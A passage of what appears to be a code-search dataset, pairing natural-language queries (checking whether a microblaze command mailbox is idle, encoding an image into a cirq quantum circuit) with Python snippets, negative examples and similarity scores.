{}\".format(self._type_connection)\n raise ValueError(msg)\n\n transa_log(data, is_hexa_data=True, who_send=who_send)\n return data", "def read_buffer(self):\n message=self._message\n return message", "def _read(self, register):\n\n assert register in _registers, 'Not a valid register. Register must be passed as string.'\n\n # send read command to register\n self.spi.writebytes([READ | _registers[register]])\n\n # return values in register\n return self.spi.readbytes(_register_len[register])", "def _receive(self, length):\n \n return self.device.read(length)" ]
[ "0.6737285", "0.65308905", "0.6498505", "0.64222383", "0.63628715", "0.6303914", "0.62050015", "0.6119331", "0.6107073", "0.60777915", "0.6036015", "0.6027135", "0.6019354", "0.5988685", "0.5962931", "0.594067", "0.59229904", "0.5910504", "0.5862011", "0.58523464", "0.5848433", "0.58402604", "0.5828221", "0.5795775", "0.5790745", "0.57674503", "0.5743325", "0.57335556", "0.57302314", "0.57141423", "0.57037383", "0.5688567", "0.568855", "0.5679042", "0.5665188", "0.5663409", "0.5661996", "0.5661996", "0.5636364", "0.5635549", "0.56252885", "0.5607194", "0.5585722", "0.55782753", "0.55618113", "0.55592877", "0.5555569", "0.5548811", "0.55314785", "0.5528288", "0.55278355", "0.551739", "0.5515901", "0.5512189", "0.5501935", "0.5493278", "0.54906017", "0.54897064", "0.5486148", "0.54747844", "0.54688966", "0.5459737", "0.54568547", "0.54469675", "0.5437859", "0.54224074", "0.54196095", "0.54173535", "0.54173535", "0.5411812", "0.5407126", "0.5403474", "0.5402293", "0.5399192", "0.5394842", "0.5393302", "0.53931874", "0.53897536", "0.5382663", "0.53799224", "0.5379772", "0.5377371", "0.5366614", "0.5364253", "0.5363836", "0.53620005", "0.5357784", "0.5357142", "0.53408074", "0.53408074", "0.53364664", "0.53356403", "0.5331873", "0.5323142", "0.53220254", "0.5321833", "0.5316188", "0.5308663", "0.53060293", "0.53022116" ]
0.6479234
3
Check whether the command mailbox is idle. Returns bool True if the command in the mailbox is idle.
def is_cmd_mailbox_idle(self): mb_cmd_word = self.microblaze.read(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET) return (mb_cmd_word & 0x1) == 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def is_idle(self) -> bool:\n return (\n await self.send_command_and_read_reply(Protocol1Command(command=\"F\")) == \"Y\"\n )", "def is_idle(self) -> bool:\n\n return self.get_runningstate == self.cmd.C815_IDLE_STATE", "def is_idle(self) -> bool:", "def is_idle(self) -> bool:\n\n return self.send(self.cmd.GET_GLOBALSTATUS_RUNNING) is False", "def is_idle(self) -> bool:\n raise NotImplementedError() # pragma: nocover", "def is_busy(self) -> bool:\n return self.__interface.read_pin(self.__interface.BUSY_PIN) == 0 # 0: busy, 1: idle.", "def _isInIdle(self):\r\n if core.FW_conf['blackbox'].isVideoRecorderAvailable() and core.FW_conf['blackbox'].videoClient.GetCurrentState() == 'idle':\r\n self.inIdle = True\r\n return True\r\n else:\r\n return False", "def __is_active(self, command):\n return True", "def still_active(pid: int, cmd: str) -> bool:\n os_cmd = get_command_for_pid(pid)\n return cmd in os_cmd", "def is_idle(self) -> bool:\n return not self.orders", "def is_idle(self):\n idle = len(self.__tasks) == 0, self.__queue.qsize() == 0\n return collections.namedtuple('TaskletIdle', ['tasklet', 'worker'])(*idle)", "async def wait_until_idle(self):\n logger.debug(f\"ML600 pump {self.name} wait until idle...\")\n while not self.is_idle():\n await asyncio.sleep(0.1)\n logger.debug(f\"...ML600 pump {self.name} idle now!\")", "def check_command(self):\n return self.process is not None and self.process.poll() is None", "def should_poll(self):\n return self._command_state is not None", "def is_busy(self):\n cons = self.rpc.call(MsfRpcMethod.ConsoleList)['consoles']\n for c in cons:\n if c['id'] == self.cid:\n return c['busy']", "def is_active(self):\n with self._lock:\n return self._robot is not None", "def is_blocked(self, idle_time = 2.0):\n return time.time() - self._last_update > idle_time", "def is_active(self):\n for unit in self.units:\n if unit.is_alive():\n return True\n return False", "def _CheckForIdleQuit(self):\n timeout = time.time() + self.idle_timeout_secs\n while time.time() < timeout:\n if self._shutdown_requested_event.is_set():\n # An external source called shutdown()\n return\n elif self._rpc_received_event.is_set():\n logging.debug('Resetting the idle timeout')\n timeout = time.time() + self.idle_timeout_secs\n self._rpc_received_event.clear()\n time.sleep(1)\n # We timed out, kill the server\n logging.warning('Shutting down the server due to the idle timeout')\n self.shutdown()", "def check( self ):\n\n if ( self.alive is not None ) \\\n and ( time.time() > ( self.alive + self.timeout ) ):\n return False\n return True", "def is_alive(self):\n self.ssh.sendline(\"clear\")\n return self.ssh.prompt()", "def isBusy(self):\n return self.busy", "def idle_check(self):\n result = []\n LOG.info('Idle check...')\n to_deactivate = self.manager.idle()\n with LOCK:\n for ctx in to_deactivate:\n LOG.info('removing idle chatstate %s', ctx.chat_id)\n self.manager.remove_chat_context(ctx)\n result.append(ctx)\n return result", "async def locked(self):\n return not \"not\" in await self.ask(\"locked\")", "def wait_until_idle(self):\n while True:\n time.sleep(self.__interface.WT_STATE_LOOKUP)\n\n if not self.is_busy:\n break", "def is_in_cmd(self):\r\n return self.select_cmd is not None", "def HasPendingCommands(self):\n\t\n return self.queue.qsize() > 0", "def isActive(self):\n return self._timerID is not None", "def is_in_terminal(self):\n return self._current_state is None", "def responds_to(self, command) -> bool:\n return command == self.command and self.active is True and self.command is not None", "def is_active(self):\n now = self.sim.now\n return (now < self.stop) and (self._number < self.max_length) \\\n and (now >= self.start)", "def busy(self) -> bool:\n return self._busy", "def GoToIdle(self):\n \n command = self.get_command_object(\"GoToIdle\")\n (return_code, message) = command()\n return [[return_code], [message]]", "def shooting(self):\r\n return not self.stopped", "def is_locked(self):\n now = get_current_time()\n if self.end <= now:\n return True\n return False", "def is_alive(self):\n return not (self._find.is_alive() or \n self._sum.is_alive() or\n self._tag.is_alive() or \n self._register.is_alive() or\n self._dispatcher.is_alive())", "def is_scheduled(self) -> bool:\n return not self.terminated and self.__state != Process.IDLE", "def inactive(self):\n return time.time() - self.last_activity > self._timeout", "def is_locked(self):\n return self._unit_got == False", "def _iswaiting(self):\n return self._ison() or self._isstandby()", "def is_alive(self):\n return (self.read_name() != '')", "def schedule_required(self) -> bool:\n return self._local.idle", "def status_callback():\n if args['retire_idle']:\n return False\n\n return True", "async def _check_idle_status(self, page: Page) -> None:\r\n # check that page has not been removed and page is not idle.\r\n if page in self.pages and not self.pages[page]['is_idle']:\r\n # check how long page has not been idle.\r\n t_since_idle = datetime.now() - self.pages[page]['time_last_idle']\r\n # check if user provided idle timout. If not, set it to 5 mins.\r\n idle_timeout = self.browsers[page.browser]['launch_options'].get(\r\n 'pageIdleTimeout', 60*5)\r\n if t_since_idle.seconds >= idle_timeout:\r\n logger.error(\r\n f\"\"\"Page {self.pages[page]['id']} has not been set idle in {str(t_since_idle)}.\r\n Assuming client side crash. Adding page to idle queue.\"\"\")\r\n # set page idle so a functioning client side task can use it.\r\n await self.set_idle(page)\r\n # check page's idle status again in about another minute.\r\n await asyncio.sleep(60)\r\n asyncio.create_task(\r\n self._check_idle_status(page))", "def check_event_channel(ctx: commands.Context) -> bool:\n if get_active_feature(ctx.channel) != ActivationState.EVENT:\n raise error_handling.InactiveChannelError()\n else:\n return True", "def is_active(self):\n LOGGER.debug('Set %d is_active check state %s', self.port_set, self.state)\n return self.state != _STATE.ERROR and self.state != _STATE.DONE", "def is_alive(self):\n if self.status == 1:\n return True\n else:\n return False", "def is_active(self):\n with self._lock:\n return self._termination_manager.is_active()", "def is_active(self):\n return self.stream.is_active()", "def is_active(self) -> bool:\n return self._stream.active", "def idleState(self, tick):\n assert (self.mState == self.States.Idle)\n\n \"\"\" If the message queue isn't empty \"\"\"\n if len(self.mMessageQueue) != 0:\n self.mBackoffIteration = 0\n self.mState = self.States.Sensing", "def is_alive(self) -> bool:\n\n\n try:\n self.sock.settimeout(2)\n except OSError:\n\n return False\n\n try:\n self.talk('/system/identity/print')\n\n except (socket.timeout, IndexError, BrokenPipeError):\n\n self.close()\n return False\n\n self.sock.settimeout(None)\n return True", "def active(self):\n return self.server.is_active() or self.executing", "def poll(self):\n _check_init()\n self._check_open()\n\n result = self._input.Poll()\n if result == _pypm.TRUE:\n return True\n\n if result == _pypm.FALSE:\n return False\n\n err_text = _pypm.GetErrorText(result)\n raise MidiException((result, err_text))", "def assumed_state(self):\n return self._command_state is False", "def is_locked(self) -> bool:\n return bool(self._node.status)", "def can_play_on_all_active(self):\n if self.last_move is None:\n return True\n x, y = self.last_move[-2:]\n if self.boards[x][y].state != State.IN_PROGRESS:\n return True\n return False", "def check_finish(self):\r\n return not self.proc.is_alive()", "def fan_timer_active(self) -> bool:\r\n self._logger.debug(log_message_formatter(\r\n \"get\", f\"{self}\", \"fan_timer_active\"))\r\n return datetime.fromisoformat(self.fan_timer_timeout) > datetime.now()", "def _idle_space(self, bucket: dict):\n date_manager = ressource_date_manager(created_at=bucket['CreationDate'])\n return date_manager.is_idle(self.RSRC_TIMEOUT)", "def active(self) -> bool:\n return self.relay(\"active\")", "def is_active(self):\n\t\tself.stream.is_active()", "def is_active(self):\n with settings(hide('running', 'stdout', 'stderr', 'warnings'), warn_only=True):\n return self._action('is-active').succeeded", "def ignore_idle_slots(self) -> pulumi.Output[bool]:\n return pulumi.get(self, \"ignore_idle_slots\")", "def active(self):\n return self in manager.handler", "def ignore_idle_slots(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_idle_slots\")", "def active(self):\n resp = self.server.request(\"get\", \"/jobs/%s/%s/state\" % (\n self.sessionid, self.name))\n if resp.body == b'1':\n return True\n return False", "def is_active(self, channel):\n return bool(int(self.bus.ask('sel:%s?' % channel)))", "def is_alive(self) -> bool:\n self.check_is_alive()\n return self.__is_alive", "def is_open(self):\n return (not self.interface.is_open)", "def is_active():\n return True", "def is_character_alive(self):\n return self.get_model.get_character.alive", "def isBusy(self):\n state = caget(self.pvBase + \":CHAN1:DeviceStatus_RBV\")\n return state != \"2\"", "def is_expired_cursor(self):\n return self._tag == 'expired_cursor'", "def busy(self) -> bool:\n return self.state != SubflowState.Available", "def check(self):\n if GPIO.input(self.number) == self.closed_state:\n current_time = now_in_ms()\n if (current_time - self.last_check_time) > self.delay:\n self.last_check_time = current_time\n return True\n return False", "def is_power_on(self):\n self._logger.debug('Getting modem state...')\n self.enable_serial_port(self.port)\n time.sleep(.8)\n self.send_command('AT')\n queue = self.serial_com.read(self.serial_com.inWaiting())\n time.sleep(.8)\n\n if 'OK' in str(queue):\n return True\n else:\n self._logger.warning('Modem is off!')\n return False", "def is_active(self):\n return not self.pending", "def alive(self):\n\n return self.subprocess.poll() is None and not self.thread_stop.is_set()", "def is_unread(self):\n return bool(self.read_at is None)", "def is_alive(self) -> bool:\n return self._main_thread.is_alive()", "def hasMACCommands(self):\n return hasattr(self, 'commands') and len(self.commands) > 0", "def active(self):\n return len(self.queue) > 0", "def check_channel_inactive(ctx: commands.Context) -> bool:\n if get_active_feature(ctx.channel) != ActivationState.INACTIVE:\n raise error_handling.ChannelAlreadyActiveError()\n else:\n return True", "def is_running(self):\n return self.action_thread and self.action_thread.is_alive()", "def is_locked(self):\n out = self.adb.get_window_policy_info()\n\n pattern = re.compile('mShowingLockscreen=(true|false)')\n return pattern.search(str(out)).group(1)", "def active(self):\n return self.starting == 0 and self.stopped == 0", "def target_is_busy(self, target_id=0):\n try:\n target = self.target(target_id=target_id)\n except:\n raise NoSuchTargetException()\n return target['state'] == \"running\"", "def isOpen(self):\n\t\treturn not self.endgame", "def is_active(self) -> bool:\r\n return self.active", "def status(self):\r\n return not self.sendQuery(\"isMoving\",\"isMoving\")", "def has_timeout(self) -> bool:\n\n return bool(self.timeout)", "def msg_ready(self):\n if self._in_queue.qsize() == 0:\n return False\n else:\n return True", "def msg_ready(self):\n if self._in_queue.qsize() == 0:\n return False\n else:\n return True", "def alive(self):\n return self._proc is not None and self._proc.poll() is None", "def is_alive(self) -> bool:\n if self._thread is None:\n return False\n return self._thread.is_alive()", "def is_alive(self):\n return hasattr(self, 'alive') and self.alive", "def is_alive(self):\n return hasattr(self, 'alive') and self.alive", "def check_is_alive(self) -> bool:\n crew_alive = False\n for operator in self.__operators:\n if operator.is_alive:\n crew_alive = True\n break\n if crew_alive and self.health > self.MIN_HEALTH:\n self.__is_alive = True\n return True\n else:\n self.__is_alive = False\n return False", "def is_running(self):\n if self._process and self._process.poll() is None:\n return True\n return False" ]
[ "0.7600817", "0.7516991", "0.7223411", "0.7089875", "0.6917131", "0.66209525", "0.6557727", "0.6422757", "0.6312891", "0.6253275", "0.62224126", "0.6158467", "0.6102417", "0.60107124", "0.5923812", "0.58288354", "0.58169097", "0.5816199", "0.5791001", "0.57627046", "0.5757289", "0.5746407", "0.5734319", "0.5691204", "0.56857747", "0.5674667", "0.565714", "0.56486446", "0.5643674", "0.5631291", "0.5628832", "0.5608774", "0.5601653", "0.55970204", "0.55919737", "0.55818564", "0.55754316", "0.5572902", "0.556618", "0.5562894", "0.5560851", "0.555285", "0.55401677", "0.55393827", "0.553278", "0.55195063", "0.5498368", "0.54878783", "0.5478399", "0.5476272", "0.5462045", "0.5456243", "0.5454226", "0.54483885", "0.543833", "0.5435219", "0.5432867", "0.54112476", "0.54030466", "0.54014844", "0.53982216", "0.53972536", "0.5395806", "0.5393668", "0.53782856", "0.53762215", "0.5346547", "0.5337494", "0.53222567", "0.53084046", "0.53059924", "0.52907664", "0.5290412", "0.5289477", "0.5288616", "0.5286823", "0.5285325", "0.52853185", "0.5281189", "0.5275186", "0.52749586", "0.5269707", "0.5266243", "0.5265541", "0.5261542", "0.52574646", "0.52574474", "0.5253014", "0.5252917", "0.5246455", "0.5245023", "0.5240202", "0.5239516", "0.5239516", "0.5227335", "0.52266085", "0.52222586", "0.52222586", "0.5220346", "0.5219579" ]
0.8497326
0
Encode truncated classical image into quantum datapoint.
def convert_to_circuit(x): y = np.arcsin(x) z = np.arccos(x**2) qubits = cirq.GridQubit.rect(5, 1) circuit = cirq.Circuit() for i in range(5): circuit.append(cirq.ry(y).on(qubits[i])) circuit.append(cirq.rz(z).on(qubits[i])) return circuit
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def encode(self, encode_data, image):\r\n raise NotImplementedError(\"Not Implemented\")", "def encode(self, signal: np.ndarray) -> np.ndarray:\n pass", "def encode_image(self, image):\n image = self.clip_preprocess(image).unsqueeze(0).to(self.device)\n image_features = self.clip_model.encode_image(image)\n return image_features.cpu().detach().numpy()", "def encode(cls, data):\n t, img = data\n # Cast double time into eight 8-bit integers\n#\t\tta=np.array(binary_cast([t],'d','hhhh'))\n ta = np.array(binary_cast([t], 'd', 'BBBBBBBB'))\n # Cast w,h 16-bit unsigned integers into two unsigned 8-bit integers\n cp = cls.compress(img)\n out = np.concatenate((ta, cp)).astype('B')\n return out", "def PositionEncoder(x, min_timescale=1.0, max_timescale=1.0e4):\n x = x.transpose(1, 2)\n length = x.size()[1]\n channels = x.size()[2]\n signal = get_timing_signal(length, channels, min_timescale, max_timescale)\n return (x + signal.to(x.get_device())).transpose(1, 2)", "def encode(image):\n from encoder import launch\n launch(image)", "def encode(self, image) -> bytes:\n raise NotImplementedError()", "def encode_self(self) -> np.ndarray:\n raise NotImplementedError", "def encode_scaled(data, size, version=0, level=QR_ECLEVEL_L, hint=QR_MODE_8,\n case_sensitive=True):\n version, src_size, im = encode(data, version, level, hint, case_sensitive)\n if size < src_size:\n size = src_size\n qr_size = (size / src_size) * src_size\n im = im.resize((qr_size, qr_size), Image.NEAREST)\n pad = (size - qr_size) / 2\n ret = Image.new(\"L\", (size, size), 255)\n ret.paste(im, (pad, pad))\n\n return (version, size, ret)", "def encode_dim(self):\n raise NotImplementedError", "def __init__(self, *args, **kwargs):\n super(Encoder, self).__init__(*args, **kwargs)\n self._mask = (1 << self._precision) - 1", "def image(self):\n\n return self.signal + self.noise", "def add_raw_signal(self, signal):\n assert int(signal[0]) == signal[0], \"Raw signal are always integers\"\n assert len(signal) == len(self.scaled_signal) and len(signal) == self.signal_length, \\\n \"Raw signal must be same size as scaled signal input:{} != scale:{}\".format(signal, self.scaled_signal)\n self.raw_signal = signal", "def encode(self, encode_data, image):\r\n\r\n encode_data += self.termination_sequence\r\n data = ''\r\n for char in encode_data:\r\n data += \"\".join(dec_2_bin(ord(char)))\r\n\r\n if not will_data_fit(len(data), image, sum(self.get_color_bits_used())):\r\n raise FileTooLargeException(\"Image to small for current settings.\")\r\n\r\n data_encode_pos = 0\r\n out_image = image.copy()\r\n curr_pixel_x = -1\r\n curr_pixel_y = -1\r\n for pixel in image.getdata():\r\n # This will hold the new array of R,G,B colors with the\r\n # embedded data\r\n new_col_arr = []\r\n\r\n curr_pixel_x = (curr_pixel_x + 1) % out_image.size[0]\r\n if curr_pixel_x == 0:\r\n curr_pixel_y += 1\r\n\r\n for curr_color_pos, color in enumerate(pixel):\r\n # if we still have data to encode\r\n if data_encode_pos < len(data):\r\n\r\n # Number of bits to encode for this color\r\n bits_to_encode = self.get_color_bits_used()[curr_color_pos]\r\n\r\n # Encode the number of bits requested\r\n tmp_color = dec_2_bin(color)\r\n\r\n # get the next bits (number) bits from data, reverse (may change) them and\r\n # assign them to the last bits (number) bits of the current color.\r\n if data_encode_pos + bits_to_encode > len(data):\r\n diff = data_encode_pos + bits_to_encode - len(data)\r\n # TODO: Use some intelligence to fill in with previous pixel data instead of garbage\r\n # We will have already encoded the termination sequence so anything here\r\n # will be ignored in decoding, so we can fill with garbage.\r\n data += ('0' * diff)\r\n\r\n # If the bits to encode for a channel is zero, don't change anything.\r\n if bits_to_encode != 0:\r\n tmp_color[-bits_to_encode:] = self.get_encode_data_bits(data, data_encode_pos, bits_to_encode)\r\n\r\n data_encode_pos += bits_to_encode\r\n\r\n # Pull out a new int value for the encoded color\r\n new_col = bin_2_dec(\"\".join(tmp_color))\r\n else:\r\n new_col = color\r\n\r\n # Append the new color to our new pixel array\r\n new_col_arr.append(new_col)\r\n\r\n # Append the new 3 color array to our new image data\r\n out_image.putpixel((curr_pixel_x, curr_pixel_y), tuple(new_col_arr))\r\n\r\n return out_image", "def preprocess(image, min_size=600, max_size=1000):\n normalize = tf.Normalize(mean=[0.485, 0.456, 0.406],\n \tstd=[0.229, 0.224, 0.225])\n\n\n C, H, W = image.shape\n scale1 = min_size / min(H, W)\n scale2 = max_size / max(H, W)\n scale = min(scale1, scale2)\n image = image / 255.\n image = sktsf.resize(image, (C, H * scale, W * scale), mode='reflect',anti_aliasing=False)\t#change this to torch\n # both the longer and shorter should be less than\n # max_size and min_size\n\n image = normalize(t.from_numpy(image))\n return image.numpy()", "def normalize(image):\r\n return image / 127.5 - 1.", "def EncodeSingleChannel(data,codingParams,iCh):\n # NEW: Determine block type and set a,b\n if(codingParams.blocksize < 2):\n b = codingParams.longBlockSize/2\n else:\n b = codingParams.shortBlockSize/2\n if(codingParams.blocksize == 1 or codingParams.blocksize == 2):\n a = codingParams.shortBlockSize/2\n else:\n a = codingParams.longBlockSize/2\n N = a+b\n halfN = N/2\n #print \"A: \", a\n #print \"B: \", b\n #print \"halfN: \", halfN\n\n # Reclaim nScaleBits from bands with 0 lines\n # vary bark width of bands\n # pass different flimits to AssignMDCTLines...\n\n nScaleBits = codingParams.nScaleBits\n maxMantBits = (1<<codingParams.nMantSizeBits) # 1 isn't an allowed bit allocation so n size bits counts up to 2^n\n if maxMantBits>16: maxMantBits = 16 # to make sure we don't ever overflow mantissa holders\n # vectorizing the Mantissa function call\n# vMantissa = np.vectorize(Mantissa)\n sfBands = codingParams.sfBands\n\n # NEW compute target bit rate based on block type\n bitBudget = codingParams.targetBitsPerSample * halfN # this is overall target bit rate\n #bitBudget -= nScaleBits*(sfBands.nBands + 1) # less scale factor bits (including overall scale factor)\n #bitBudget -= codingParams.nMantSizeBits*sfBands.nBands # less mantissa bit allocation bits\n #bitBudget -= 2 # block ID size TODO: make this a variable\n\n if codingParams.doSBR == True:\n # Calculate Spectral Envelope based on original signal\n specEnv = calcSpecEnv(data,codingParams.sbrCutoff,codingParams.sampleRate)\n # Append in spectral envelope for this channel into empty container\n codingParams.specEnv[iCh][:] = specEnv\n\n #Decimate and lowpass signal by factor determined by cutoff frequency\n doDecimate = False\n if doDecimate==True:\n Wc = codingParams.sbrCutoff/float(codingParams.sampleRate/2.)# Normalized cutoff frequency\n B,A = signal.butter(4,Wn)\n data = signal.lfilter(B,A,data)\n\n # window data for side chain FFT and also window and compute MDCT\n timeSamples = data\n # Window data based on block size\n mdctTimeSamples = np.append(SineWindow(np.append(timeSamples[:a],np.zeros(a)))[:a],SineWindow(np.append(np.zeros(b),timeSamples[a:]))[b:])\n # Call MDCT with a, b reflecting block size\n mdctLines = MDCT(mdctTimeSamples, a, b)\n\n # compute overall scale factor for this block and boost mdctLines using it\n maxLine = np.max( np.abs(mdctLines) )\n overallScale = ScaleFactor(maxLine,nScaleBits) #leading zeroes don't depend on nMantBits\n mdctLines *= (1<<overallScale)\n\n # compute the mantissa bit allocations\n # compute SMRs in side chain FFT\n SMRs = CalcSMRs(timeSamples, mdctLines, overallScale, codingParams.sampleRate, sfBands)\n #print \"BitBudget: \", bitBudget\n if codingParams.doSBR == True:\n # Critical band starting here are above cutoff\n cutBin = freqToBand(codingParams.sbrCutoff)\n # perform bit allocation using SMR results\n bitAlloc = BitAllocSBR(bitBudget, maxMantBits, sfBands.nBands, sfBands.nLines, SMRs, codingParams.bitReservoir, codingParams.blocksize, cutBin)\n else:\n bitAlloc = BitAlloc(bitBudget, maxMantBits, sfBands.nBands, sfBands.nLines, SMRs, codingParams.bitReservoir, codingParams.blocksize)\n codingParams.bitReservoir += bitBudget - np.sum(bitAlloc * sfBands.nLines)\n #print \"blocksize: \", codingParams.blocksize\n #print \"Bit Reservoir: \", codingParams.bitReservoir\n #if codingParams.blocksize == 2:\n # print bitAlloc\n # given the bit allocations, quantize the mdct lines in each band\n scaleFactor = np.empty(sfBands.nBands,dtype=np.int32)\n nMant = halfN\n\n for iBand in range(sfBands.nBands):\n if not bitAlloc[iBand]: nMant-= sfBands.nLines[iBand] # account for mantissas not being transmitted\n mantissa=np.empty(nMant,dtype=np.int32)\n iMant=0\n for iBand in range(sfBands.nBands):\n lowLine = sfBands.lowerLine[iBand]\n highLine = sfBands.upperLine[iBand] + 1 # extra value is because slices don't include last value\n nLines= sfBands.nLines[iBand]\n if(highLine - lowLine > 0):\n scaleLine = np.max(np.abs( mdctLines[lowLine:highLine] ) )\n else:\n scaleLine = abs(mdctLines[lowLine])\n scaleFactor[iBand] = ScaleFactor(scaleLine, nScaleBits, bitAlloc[iBand])\n if bitAlloc[iBand]:\n mantissa[iMant:iMant+nLines] = vMantissa(mdctLines[lowLine:highLine],scaleFactor[iBand], nScaleBits, bitAlloc[iBand])\n iMant += nLines\n # end of loop over scale factor bands\n\n # return results\n return (scaleFactor, bitAlloc, mantissa, overallScale)", "def encoder(self, value):\n self._tensor.encoder = value", "def _quantize(self) :\n self.A[self.A <= self.thr] = -1\n self.A[self.A > self.thr] = 1\n self.A = self.A.astype(\"int\")", "def encode(self, y):\n raise NotImplementedError", "def denormalize_data_unit_interval(data):\n if data.dtype == 'uint8':\n return\n return (data * 255.0).astype('uint8')", "def EncoderImage(config):\n\n # data_name, img_dim, embed_size, finetune=False,\n # cnn_type='vgg19', use_abs=False, no_imgnorm=False):\n\n embed_size = config['model']['embed-size']\n order_embeddings = config['training']['measure'] == 'order'\n if config['image-model']['name'] == 'bottomup':\n transformer_layers = config['image-model']['transformer-layers']\n pos_encoding = config['image-model']['pos-encoding']\n visual_feat_dim = config['image-model']['feat-dim']\n dropout = config['image-model']['dropout']\n img_enc = TransformerPostProcessing(transformer_layers, visual_feat_dim, embed_size, n_head=4, aggr='mean', pos_encoding=pos_encoding, dropout=dropout, order_embeddings=order_embeddings)\n else:\n img_enc = None\n\n return img_enc", "def reScaleLandsat(self,img):\n \n\t\tthermalBand = ee.List(['thermal'])\n\t\tthermal = ee.Image(img).select(thermalBand).multiply(10)\n \n\t\totherBands = ee.Image(img).bandNames().removeAll(thermalBand)\n\t\tscaled = ee.Image(img).select(otherBands).divide(0.0001)\n \n\t\timage = ee.Image(scaled.addBands(thermal)).int16()\n \n\t\treturn image.copyProperties(img)", "def _define_encoder(self):\n self.encoder = nn.Sequential(View((-1, 64 * 64 * 3)),\n nn.Linear(64 * 64 * 3, 5120, bias=False), nn.SELU(),\n nn.BatchNorm1d(5120),\n nn.Linear(5120, 2560, bias=False), nn.SELU(),\n nn.BatchNorm1d(2560),\n nn.Linear(2560, 512, bias=False), nn.SELU(),\n nn.BatchNorm1d(512),\n nn.Linear(512, 128, bias=False), nn.SELU(),\n nn.BatchNorm1d(128),\n nn.Linear(128, self.encoding_shape, bias=False), nn.SELU(),\n )", "def make_encoder(self, input_size: int, latent_size: int) -> nn.Module:\n pass", "def augment(self, image):\n pass", "def encode(\n self,\n x_param,\n signal_end_time,\n tolerance=1e-8,\n ):\n\n self.__dict__.update(self.params.__dict__)\n\n discrete_encoder = DiscreteEncoder(self.params)\n # TODO need to find smarter way of setting delta_t, also depending on size of signal and b\n delta_t = (2 * np.pi / x_param.max_frequency) / 100\n approx_spikes = discrete_encoder.encode(x_param, signal_end_time, delta_t)\n\n y_param = x_param.get_mixed_signals(self.mixing_matrix)\n spikes = SpikeTimes(self.n_channels)\n\n def fun(\n integral_end_time,\n signal,\n channel,\n integral_start_time,\n ):\n weighted_integral = self._get_weighted_integral(\n signal,\n channel,\n integral_start_time,\n integral_end_time,\n )\n return (2 * self._delta[channel] - weighted_integral) ** 2\n\n for ch in range(self.n_channels):\n last_spike = 0\n spikes_of_ch = approx_spikes[ch]\n\n for i_s, s in enumerate(spikes_of_ch):\n next_spike = scipy.optimize.minimize(\n fun,\n s,\n (y_param, ch, last_spike),\n bounds=[\n (\n spikes_of_ch[i_s - 1] if i_s > 0 else 0,\n spikes_of_ch[i_s + 1]\n if i_s < len(spikes_of_ch) - 1\n else signal_end_time,\n )\n ],\n tol=tolerance,\n ).x[0]\n spikes.add(ch, next_spike)\n last_spike = next_spike\n return spikes", "def normalize(image):\n return image / 127.5 - 1.", "def postprocess_img(img):\n img = img.transpose((1, 2, 0))\n img += 1.0\n img = (img * 128.0).astype(np.uint8)\n return img", "def get_scaled_image(self, min_width=1024):\n self.dispersion = self.image.getCalibration().pixelWidth\n self.offset = self.image.getCalibration().xOrigin\n binning = 1\n while binning * min_width < self.image.getWidth():\n binning *= 2\n if binning > 1:\n binning /= 2\n IJ.run(self.image, 'Select None', '')\n new_image = self.image.crop()\n IJ.run(new_image, 'Bin...', 'x=%d y=%d binning=Average' %\n (binning, binning))\n self.dispersion *= binning\n self.offset /= binning\n self.image = new_image\n return new_image", "def getEncode(self, img):\n img_ = self.preprocess(img)\n fv = self.model_.predict(img_)\n fv = fv.reshape(-1, 1)\n return fv", "def _define_encoder(self):\n raise NotImplementedError", "def EncoderImage(data_name, img_dim, embed_size, finetune=False,\n cnn_type='resnet', use_abs=False, no_imgnorm=False):\n if data_name.endswith('precomp'):\n img_enc = EncoderImagePrecomp(\n img_dim, embed_size, use_abs, no_imgnorm)\n else:\n img_enc = EncoderImageFull(\n embed_size, finetune, cnn_type, use_abs, no_imgnorm)\n\n return img_enc", "def encode_dataset(batch_size,downscale_factor,dataset, pooling_function):\n \n n,l=np.shape(dataset)\n f=downscale_factor\n n_batches=n//batch_size\n batches=np.linspace(1,n_batches,n_batches, dtype=int) * batch_size\n\n gaf = GramianAngularField(image_size=1., method='summation')\n \n print('Encoding started...')\n for p in range(n_batches):\n if p==0:\n X_gaf = gaf.transform(dataset[0:batches[p],:])\n sample=block_reduce(X_gaf[0], block_size=(f, f), func=pooling_function)\n l_red = sample.shape[0]\n X_gaf_red = np.zeros((n,l_red,l_red))\n print('output 3D Matrix shape: ', np.shape(X_gaf_red))\n\n j=0\n for i in range(0,batches[p]):\n X_gaf_red[i] = block_reduce(X_gaf[j], block_size=(f, f) , func=pooling_function)\n j+=1\n\n else: \n X_gaf = gaf.transform(X[batches[p-1]:batches[p],:])\n\n j=0\n for i in range(batches[p-1],batches[p]):\n X_gaf_red[i] = block_reduce(X_gaf[j], block_size=(f, f) , func=pooling_function)\n j+=1\n \n print('Encoding successful!')\n print('#####################################')\n \n return X_gaf_red", "def preprocess(img_name, quality=None):\n img = plt.imread(img_name)\n Y, X, C = img.shape\n img = img[:Y-Y%2, :X-X%2, :3]\n if quality is not None:\n img = jpeg_compress(img, quality)\n img = img_to_tensor(img).cuda().type(torch.float)\n return img", "def __resize_to_512(input_data):\n test_size = 720\n\n if DataAugmentor._is_synthtext(input_data):\n input_data['contour'] = [[np.cast['int32'](np.stack([contour[:, :, 0] * 512 / input_data['img'].shape[0],\n contour[:, :, 1] * 512 / input_data['img'].shape[1]],\n axis=-1))\n for contour in contours] for contours in input_data['contour']]\n else:\n input_data['contour'] = [np.cast['int32'](np.stack([contour[:, :, 0] * 512 / input_data['img'].shape[0],\n contour[:, :, 1] * 512 / input_data['img'].shape[1]],\n axis=-1)) for contour in input_data['contour']]\n input_data['center_point'] = [(np.cast['int32'](point[0] * 512 / input_data['img'].shape[0]),\n np.cast['int32'](point[1] * 512 / input_data['img'].shape[1]))\n for point in input_data['center_point']]\n\n seq = iaa.Sequential([\n iaa.Scale({'height': 512, 'width': 512}, 'cubic')\n ])\n input_data['img'] = seq.augment_image(input_data['img'])\n\n return input_data", "def normalize(img):\n\n def normalize_pixel(x):\n return (x - 128) / 128\n\n normalize_vector = np.vectorize(normalize_pixel)\n return normalize_vector(img)", "def process_image(self, image):\r\n img = cv2.imread(image)\r\n img = img.astype(float)/127 - 1\r\n return np.expand_dims(img, axis=0)", "def get_position_encoding(\n length, 